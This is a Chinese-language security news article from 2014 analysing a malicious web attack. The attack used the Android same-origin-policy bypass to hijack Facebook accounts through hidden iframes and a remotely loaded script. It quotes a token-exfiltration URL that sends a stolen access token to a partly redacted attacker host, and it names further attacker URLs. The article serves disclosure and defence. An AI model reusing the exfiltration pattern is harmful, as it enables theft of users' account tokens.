竊取Facebook用戶信息:利用Android同源策略漏洞的惡意應用被
責編:admin |2014-12-31 13:51:46幾個月前我們曾研究過Android同源策略(SOP)的漏洞,然而最近出現了一款利用此漏洞對Facebook用戶進行攻擊的惡意應用,其利用代碼基于已公開的Metasploit測試代碼。
科普:同源策略繞過漏洞
同源策略(SOP)是指客戶端腳本(尤其是Javascript)的重要的安全度量標準,是瀏覽器安全核心基礎。它最早出自Nescape Navigator2.0,其目的是防止某個文檔或腳本從多個不同源裝載。這里的同源指的是同域名、同協議和同端口。
而同源策略繞過發(fā)生在A網站(以sitea.com為例)以某種方式訪問B網站(以siteb.com為例)的屬性如cookie、位置、響應等的時候。由于這個問題的特殊性和可能潛在影響,瀏覽器對此都有非常嚴格的管理模式,在現在的瀏覽器中很少能發(fā)現同源策略(SOP)繞過。
攻擊過程
攻擊是通過向某個特定Facebook網頁引用惡意網站的鏈接來實現的。
此網頁包含惡意的Javascript代碼:
它會試圖在內嵌框架里加載一個Facebook網址:
由于該頁面的html內容被div的css設置為不會顯示任何內容(display:none),用戶只會看到一片空白:
并且該內嵌框架還只有1像素(1px)的大小:
基于以上這些條件,同源策略被繞過。通過構造語句,攻擊者從一個能外鏈的云存儲空間加載了一個遠程JS代碼文件,該文件包含了本次攻擊所需要的惡意代碼。
該JS代碼可以讓黑客在Facebook上實現以下行動:
1.添加Facebook好友
2.關注Facebook文章
3.修改訂閱項
4.授權Facebook應用訪問用戶的私密信息(類似于與qq號關聯)
5.竊取用戶的token并后臺上傳:http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token;
6.收集分析數據(如受害者的位置,HTTP referer等等),在https://whos.{BLOCKED}ung.us/pingjs/上使用合法的服務
除了網站中上述的代碼外,我們在http://www.{BLOCKED}php.com/x/toplu.php里發(fā)現了相似的攻擊痕跡。可以肯定的是,這些都是出自同一攻擊者的手筆,因為他們有著同樣的函數名,以及相同的Facebook應用client_id。
官方授權未必安全
該惡意軟件的client_id為2254487659,這是一個由黑莓官方授權過的應用。我們與黑莓官方確認過,這款應用打著黑莓的認證牌子試圖竊取Facebook用戶的認證token。有了這個token可以讓黑客從Facebook的API讀取個人敏感信息,以及發(fā)布文章訊息等。
黑莓官方由此發(fā)布了以下聲明:
“這款惡意軟件的攻擊對象為Facebook用戶,其使用了Android同源策略繞過漏洞,且無視移動設備平臺類型。其試圖利用黑莓官方的認證的便利對Facebook WEB應用進行攻擊。此次事件并不是黑莓硬件、軟件產生了漏洞,與黑莓的網絡通信也沒有什么關系。”
Google目前已經修復了這個Android同源策略漏洞。然而不是所有的用戶都會去升級瀏覽器或安卓系統版本。因此除非設備的供應商能發(fā)布相應補丁,不然用戶仍會處于威脅之中。